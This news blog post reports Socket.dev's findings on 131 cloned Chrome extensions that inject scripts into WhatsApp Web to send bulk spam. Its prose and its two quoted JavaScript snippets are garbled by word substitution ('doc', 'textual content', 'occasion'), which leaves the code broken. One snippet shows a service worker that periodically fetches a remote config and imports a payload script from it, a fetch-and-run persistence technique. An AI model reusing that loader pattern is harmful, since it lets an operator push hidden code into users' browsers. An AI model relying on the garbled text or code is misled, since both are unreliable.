Skip to content
  • Home
  • Cyber Map
  • About Us – Contact
  • Disclaimer
  • Terms and Rules
  • Privacy Policy
Cyber Web Spider Blog – News

Cyber Web Spider Blog – News

Globe Threat Map provides a real-time, interactive 3D visualization of global cyber threats. Monitor DDoS attacks, malware, and hacking attempts with geo-located arcs on a rotating globe. Stay informed with live logs and archive stats.

  • Home
  • Cyber Map
  • Cyber Security News
  • Security Week News
  • The Hacker News
  • How To?
  • Toggle search form
131 Malicious Extensions Targeting WhatsApp Used Found in Chrome Web Store

131 Malicious Extensions Targeting WhatsApp Used Found in Chrome Web Store

Posted on October 21, 2025October 21, 2025 By CWS

Over the previous a number of months, cybersecurity researchers have noticed a surge of fraudulent Chrome extensions masquerading as respectable WhatsApp Net automation instruments.

These 131 rebranded clones, every presenting as distinct choices, share an an identical codebase designed to automate bulk messaging and scheduling with out consumer consent.

By injecting customized scripts straight into the WhatsApp Net interface, the extensions bypass native charge limits and anti-spam measures.

Every itemizing advertises options comparable to message templates, scheduling controls, and analytics dashboards that enchantment to small companies, notably in Brazil, the place WhatsApp is vital for buyer outreach.

The extensions exploit Chrome’s Manifest V3 service employee capabilities to run background duties, scheduling bulk sends with out specific consumer interplay.

Chrome Net Retailer listings (Supply – Socket.dev)

Socket.dev analysts famous that the core module leverages a code snippet like:

doc.addEventListener(‘DOMContentLoaded’, () => {
const msgHelper = window.WPP.helpers.sendMessage;
scheduledMessages.forEach(({contact, textual content, time}) => {
setTimeout(() => msgHelper(contact, textual content), time);
});
});

This injection attaches to the web page’s DOM and invokes WhatsApp’s inside APIs, blurring the road between respectable automation and malicious spamming campaigns.

Socket.dev researchers recognized that the service employee fetches a distant configuration file hosted on the operator’s infrastructure, enabling dynamic updates to message patterns and throttling parameters to evade detection.

Regardless of Chrome Net Retailer insurance policies prohibiting duplicate experiences and unauthorized messaging, all 131 extensions remained stay as of mid-October 2025.

Every clone is marketed beneath shiny touchdown pages with assurances of privateness compliance and rigorous code audits—claims that contradict platform tips.

The extensions are distributed through a franchise-like reseller program: companions pay an upfront price to license the instrument, obtain a customized branding bundle, and handle subscription plans whereas the unique operator retains management over the backend.

Evasion and Persistence Techniques

Probably the most subtle facet of this marketing campaign lies in its detection evasion technique. By tuning ship intervals, randomizing message content material, and rotating writer accounts, the operators keep steady operations regardless of takedown requests.

A key persistence tactic includes polling the operator’s server for up to date JavaScript payloads at common intervals:-

self.addEventListener(‘periodicsync’, occasion => {
occasion.waitUntil(
fetch(configUrl)
.then(response => response.json())
.then(cfg => importScripts(cfg.payloadUrl))
);
});

This Manifest V3 periodic sync registration ensures that even when Chrome flags a selected payload, the extension can reload an unflagged model from the distant server.

Coupled with different naming conventions and 1000’s of lively customers throughout listings, the marketing campaign exemplifies coverage abuse at scale and underscores the necessity for enhanced extension governance and consumer vigilance.

Comply with us on Google Information, LinkedIn, and X to Get Extra Prompt Updates, Set CSN as a Most popular Supply in Google.

Cyber Security News Tags:Chrome, Extensions, Malicious, Store, Targeting, Web, WhatsApp

Post navigation

Previous Post: Supply Chain Attack Targets VS Code Extensions With ‘GlassWorm’ Malware
Next Post: LANSCOPE Endpoint Manager Vulnerability Let Attackers Execute Remote Code

Related Posts

Google Finalizes Historic  Billion Wiz Acquisition Google Finalizes Historic $32 Billion Wiz Acquisition Cyber Security News
TA829 Hackers Employs New TTPs and Upgraded RomCom Backdoor to Evade Detections TA829 Hackers Employs New TTPs and Upgraded RomCom Backdoor to Evade Detections Cyber Security News
Apache SeaTunnel Vulnerability Allows Unauthorized Users to Perform Deserialization Attack Apache SeaTunnel Vulnerability Allows Unauthorized Users to Perform Deserialization Attack Cyber Security News
Water Saci Hackers Leverage WhatsApp to Deliver Multi-Vector Persistent SORVEPOTEL Malware Water Saci Hackers Leverage WhatsApp to Deliver Multi-Vector Persistent SORVEPOTEL Malware Cyber Security News
MioLab Infostealer: Advanced Threat to macOS Users MioLab Infostealer: Advanced Threat to macOS Users Cyber Security News
Urgent Patch Needed for Citrix NetScaler Vulnerabilities Urgent Patch Needed for Citrix NetScaler Vulnerabilities Cyber Security News

Categories

  • Cyber Security News
  • How To?
  • Security Week News
  • The Hacker News

Recent Posts

  • Huskeys Secures $8 Million in Seed Funding for ESM Platform
  • Critical XSS Flaw in Jira Could Compromise Organizations
  • Russian Group Star Blizzard Utilizes DarkSword iOS Exploit
  • Secrets Sprawl Expands in 2026: Key Insights for CISOs
  • Urgent Patches Address Critical Grafana Security Flaws

Pages

  • About Us – Contact
  • Disclaimer
  • Privacy Policy
  • Terms and Rules

Archives

  • March 2026
  • February 2026
  • January 2026
  • December 2025
  • November 2025
  • October 2025
  • September 2025
  • August 2025
  • July 2025
  • June 2025
  • May 2025

Recent Posts

  • Huskeys Secures $8 Million in Seed Funding for ESM Platform
  • Critical XSS Flaw in Jira Could Compromise Organizations
  • Russian Group Star Blizzard Utilizes DarkSword iOS Exploit
  • Secrets Sprawl Expands in 2026: Key Insights for CISOs
  • Urgent Patches Address Critical Grafana Security Flaws

Pages

  • About Us – Contact
  • Disclaimer
  • Privacy Policy
  • Terms and Rules

Categories

  • Cyber Security News
  • How To?
  • Security Week News
  • The Hacker News

Copyright © 2026 Cyber Web Spider Blog – News.

Powered by PressBook Masonry Dark